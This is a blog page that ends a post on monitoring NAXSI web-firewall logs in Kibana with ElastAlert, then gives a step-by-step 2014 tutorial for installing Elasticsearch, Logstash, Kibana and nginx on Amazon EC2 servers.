<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">2015/11/14 14:43:36 [error] 5182#0: *10 NAXSI_FMT: ip=X.X.X.X&server=Y.Y.Y.Y&uri=/some--file.html&learning=1&total_processed=10&total_blocked=6&zone0=URL&id0=1007&var_name0=&zone1=ARGS&id1=1007&var_name1=asd, client: X.X.X.X, server: localhost, request: "GET /some--file.html?asd=-- HTTP/1.1", host: "Y.Y.Y.Y"</span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Now that we have the log, we need to ingest it into our Log system. The most important part of this process is indexing the correct components we would want to visualise later in kibana. For us the crucial part was the clientIP “ip” and the “request” part of the log.</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh5.googleusercontent.com/wkS-X6KIoAh_qKOAC7w6ajrN6DDdwSWnHy5Lmb1uqPtMAxAcEwzmWE3yXqvPM9a0Q-jDtiwzQGI4PbX9FeeZNOsI_ZSJ5bvElVBhMHjtxiifiXz8j3HGL9jVwVgD_u_w-aEDrha0" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2016-04-16 at 11.59.29 AM.png" border="0" height="145" src="https://lh5.googleusercontent.com/wkS-X6KIoAh_qKOAC7w6ajrN6DDdwSWnHy5Lmb1uqPtMAxAcEwzmWE3yXqvPM9a0Q-jDtiwzQGI4PbX9FeeZNOsI_ZSJ5bvElVBhMHjtxiifiXz8j3HGL9jVwVgD_u_w-aEDrha0" style="border: none; transform: rotate(0rad);" width="624" /></a></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">Now once your Kibana dashboard is up and ready I recommend using Elastalerts </span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><a href="https://github.com/Yelp/elastalert">https://github.com/Yelp/elastalert</a></span></span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">] to get the necessary alerting for the attack IP’s that you are monitoring for.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">Here is a quick attack alert triggered:</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvDFqibu5JZZxYKm6neE28Fmh-EfigsqGPV1VHlZy4vDnUOsIGweH64-tF2oogTGrDtJj370YrCmdZkwBxm_ocwPIk_uXsdnuyhnzZZTbL0RDxvEzKK6Rrl3cH8zdCbe61o3gf4_A91nU/s1600/Screen+Shot+2016-04-16+at+2.07.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvDFqibu5JZZxYKm6neE28Fmh-EfigsqGPV1VHlZy4vDnUOsIGweH64-tF2oogTGrDtJj370YrCmdZkwBxm_ocwPIk_uXsdnuyhnzZZTbL0RDxvEzKK6Rrl3cH8zdCbe61o3gf4_A91nU/s400/Screen+Shot+2016-04-16+at+2.07.07+PM.png" width="400" /></a></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Some References:</b></span></span></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you are planning to implement NAXSI in your infrastructure I recommend reading </span></span></div>
<div style="text-align: left;">
<div style="text-align: left;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/nbs-system/naxsi" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/nbs-system/naxsi</span></a></div>
<a href="https://www.owasp.org/index.php/OWASP_NAXSI_Project" style="line-height: 1.38; text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.owasp.org/index.php/OWASP_NAXSI_Project</span></a><span id="docs-internal-guid-c144d0cf-1e4c-7165-df24-c51da4534662"></span></div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-decoration: none; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"></span></span></div>
<div style="line-height: 1.38; text-decoration: none; text-indent: 36pt;">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-16746773129244739612014-07-27T06:32:00.002-07:002016-05-08T23:04:07.407-07:00Installing ElasticSearch Logstash & Kibana #EKL #Logstash-forwader #COMBINEDAPACHELOG #AmazonEC2<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div style="text-align: left;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">It’s been a year since I last updated the blog, laziness wins any day! :P.
This blog entry will illustrate how to setup an out of the box installation for
EKL.</span><span style="font-family: "verdana";">This setup was done on Amazon EC2 instances, this will cover the
following topics:</span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b><br /></b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> a)
Setting up ElasticSearch <o:p></o:p></b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> b)
Setting up Logstash Server<o:p></o:p></b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> c)
Setting up Logstash-Forwader<o:p></o:p></b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> d)
Setting up Kibana</b></span><br />
<span style="font-family: "verdana";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><b>[Logstash 1.4.2 and Kibana 3 ElasticSearch 1.3]</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Below is the pictorial
setup which I have up and running.</span><span style="font-family: "verdana";">The Final aim would be to send Apache access logs from Server [EC2_A] to Server [EC2_B] and create a Elastic cluster named (elasticsearch) and show the graphical representation in Kibana</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; margin-left: 1em; margin-right: 1em;"></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHX7JPPM6Pt36leAZnyrUHydXhGAuA55wG9z6_mFUwcg969-CU2F1GM5QkigyldWrQrnoKz9FulYlk_fHhITDDqdzoIQFy-MODU0Fp8vl7AnT0HWX5bsDInsA6Xfjl2otgH-6QFjK_qo/s1600/Screen+Shot+2014-07-27+at+6.49.09+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHX7JPPM6Pt36leAZnyrUHydXhGAuA55wG9z6_mFUwcg969-CU2F1GM5QkigyldWrQrnoKz9FulYlk_fHhITDDqdzoIQFy-MODU0Fp8vl7AnT0HWX5bsDInsA6Xfjl2otgH-6QFjK_qo/s1600/Screen+Shot+2014-07-27+at+6.49.09+pm.png" width="640" /></a></div>
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Here the EC2_A Server is our
Logstash_forwader/Shipper. On our EC2_B we have the Elastic cluster and the logstash Server which is running, and the UI is shown in Kibana.<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";">There are many online resources, which we can refer to get the above
setup. However, they are not at one single place, I had to search at multiple
places to get the above setup running.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">One of the best resource I came across is the <a href="http://www.logstashbook.com/TheLogstashBook_sample.pdf" target="_blank">Logstash Cook Book </a> and the EKL installation guide by <a href="https://www.digitalocean.com/community/tutorials/how-to-use-logstash-and-kibana-to-centralize-and-visualize-logs-on-ubuntu-14-04" target="_blank">Digital Ocean</a>.<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Certainly, there were lot of initial breakers I faced, but with this blog
entry I suppose one should not face any problems while installing.<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">For
starters, who are not familiar with EKL can read about these components here.
ElasticSearch(<a href="http://en.wikipedia.org/wiki/Elasticsearch"><span style="color: #0000e9;">http://en.wikipedia.org/wiki/Elasticsearch</span></a>),
Logstash(<a href="http://logstash.net/"><span style="color: #0000e9;">http://logstash.net/</span></a>),
Kibana(<a href="http://rashidkpc.github.io/Kibana/"><span style="color: #0000e9;">http://rashidkpc.github.io/Kibana/</span></a>).</span><o:p></o:p></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Let’s
Start!<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">We
will try setting up the <b>EC2_B </b>box first.<o:p></o:p></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>EC2_B Config</b>:</span><span style="font-family: "courier new" , "courier" , monospace;"> (Micro instance) <span style="background-color: white; color: #444444; font-weight: bold; line-height: 18.200000762939453px;">Ubuntu Server 14.04_32bit: </span>Linux ip-192.168.2.2 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:02:19 UTC 2014 i686 i686 i686 GNU/Linux</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing
Dependencies:</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">(The only prerequisite required by Logstash is Java runtime)</span><o:p></o:p><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo add-apt-repository -y
ppa:webupd8team/java</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo apt-get update</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo apt-get -y install
oracle-java7-installer</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b><span style="color: #0e0e0e;">Now try:</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">java -version</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">java version "1.7.0_45"<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Java(TM) SE Runtime Environment (build 1.7.0_45-b18)<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Java HotSpot(TM) 64-Bit Server VM (build 24.45-b08, mixed mode)</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Install Elastic Search:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">curl -O <a href="https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.1.1.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.1.1.tar.gz</span></a><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">tar zxvf elasticsearch-1.1.1.tar.gz<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">cd elasticsearch-1.1.1/</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">./bin/elasticsearch & <b>--</b><span style="font-size: x-small;">This will start Elastic Search</span></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><b style="font-family: verdana, sans-serif;">Install Kibana:</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">cd ~; wget <a href="https://download.elasticsearch.org/kibana/kibana/kibana-3.0.1.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/kibana/kibana/kibana-3.0.1.tar.gz</span></a></span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">tar xvf kibana-3.0.1.tar.gz</span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e;"><span style="font-family: "courier new" , "courier" , monospace;">sudo vi ~/kibana-3.0.1/config.js <b>--</b><span style="font-size: x-small;">Now change the text from 9200 to 80</span></span></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;"> elasticsearch:
"http://"+window.location.hostname+":80”,</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">sudo mkdir -p /var/www/kibana3</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">sudo cp -R ~/kibana-3.0.1/* /var/www/kibana3/</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;"><br /></span></span>
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b>Install nginx to host Kibana:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace; mso-bidi-font-family: Courier;">sudo apt-get install nginx</span><span style="font-family: "courier"; mso-bidi-font-family: Courier;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$<span style="color: #0e0e0e;"> </span><span style="color: #0e0e0e;">cd ~; wget <a href="https://github.com/elasticsearch/kibana/raw/master/sample/nginx.conf"><span style="color: #0000e9;">https://github.com/elasticsearch/kibana/raw/master/sample/nginx.conf</span></a></span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$<span style="color: #0e0e0e;"> </span><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">vi nginx.conf <b>--</b><span style="font-size: x-small;">Now change the value of root as below</span></span></span><span style="font-family: "courier"; font-size: x-small; mso-bidi-font-family: Courier;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;"> root to /var/www/kibana3</span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">;</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo service nginx restart</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Now go to http://[IP]/kibana3 to check if Kibana UI is visible.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier"; mso-bidi-font-family: Courier;"><br /></span>
<span style="font-family: "courier"; mso-bidi-font-family: Courier;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>Install Logstash:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">curl -O <a href="https://download.elasticsearch.org/logstash/logstash/logstash-1.4.2.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/logstash/logstash/logstash-1.4.2.tar.gz</span></a><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">tar zxvf logstash-1.4.2.tar.gz</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now Generate the SSL Certificate:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo mkdir -p /etc/pki/tls/certs<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo mkdir /etc/pki/tls/private</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">Now we will edit the openssl.cnf
file so that later on we won’t face any issues when we compile our logstash-forwader using </span><span style="font-family: "verdana" , sans-serif;"><span style="background-color: #f8f8f8; color: #333333; line-height: 20.399999618530273px;">go1.3 linux/amd64</span><span style="color: #0e0e0e;"> </span></span><span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">on EC2_A (More
details </span><a href="https://github.com/elasticsearch/logstash-forwarder/issues/221" style="font-family: Verdana, sans-serif;">here</a><span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">)</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier";"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">Vi /etc/ssl/openssl.cnf</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">In the [v3_ca] section add the following entry<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">subjectAltName = IP:192.168.2.2</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Note: Here the IP address has to be of the EC2_B. machine.</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>Now lets create a index on our Elastic cluster:</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Lets first install a plugin named "head"</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">cd ~/elasticsearch-1.1.1/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">bin/plugin --install mobz/elasticsearch-head</span><br />
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Now go to http://IP(EC2_B):9200/_plugin/head/</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Go to indices tab and create a new index called "apache"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkzSHHDhFxgflIqtcdwsZdeeZw7TvVStnSM-y2kSJsef1BgtYd5a6ALSMD8W3m8aoEUNxpsHhdC7UM7tuwfx5SGipn8_9tqz2tWBz3JmQCOFMRqdIpC3X5jccJgkfMAjx2TyKDrwBMkM/s1600/Screen+Shot+2014-07-27+at+6.16.03+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkzSHHDhFxgflIqtcdwsZdeeZw7TvVStnSM-y2kSJsef1BgtYd5a6ALSMD8W3m8aoEUNxpsHhdC7UM7tuwfx5SGipn8_9tqz2tWBz3JmQCOFMRqdIpC3X5jccJgkfMAjx2TyKDrwBMkM/s1600/Screen+Shot+2014-07-27+at+6.16.03+pm.png" width="640" /></a></div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";"><br /></span></div>
